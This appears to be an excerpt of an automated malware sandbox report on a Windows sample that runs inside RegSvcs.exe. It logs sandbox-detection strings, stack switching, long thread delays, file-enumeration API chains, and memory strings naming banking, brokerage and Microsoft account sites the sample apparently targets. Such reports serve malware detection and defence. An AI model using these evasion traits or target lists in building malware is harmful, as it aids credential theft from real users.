Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

API/Special instruction interceptor: Address: 1010084

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: n0nsAzvYNd.exe, 00000000.00000003.2042913972.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, n0nsAzvYNd.exe, 00000000.00000003.2043065197.0000000000EB9000.00000004.00000020.00020000.00000000.sdmp, n0nsAzvYNd.exe, 00000000.00000002.2055597098.0000000000EB9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: PROCMON.EXE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

2_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598558	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598450	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598322	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598213	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595798	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595479	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594156	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8133			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1718			Jump to behavior

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102748

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

API coverage: 4.4 %

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0040445A
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040C6D1 FindFirstFileW,FindClose,	0_2_0040C6D1
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0040C75C
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0040EF95
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0040F0F2
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0040F3F3
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_004037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004037EF
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_00403B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00403B12
Source: C:\Users\user\Desktop\n0nsAzvYNd.exe	Code function: 0_2_0040BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0040BCBC

Source: C:\Users\user\Desktop\n0nsAzvYNd.exe

Code function: 0_2_003A49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_003A49A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598558	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598450	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598322	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598213	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595798	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595479	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594156	Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegSvcs.exe, 00000002.00000002.4520664980.0000000073466000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: gFs(gFsDgFshgFs
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegSvcs.exe, 00000002.00000002.4516159706.00000000044E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegSvcs.exe, 00000002.00000002.4516159706.000000000448E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
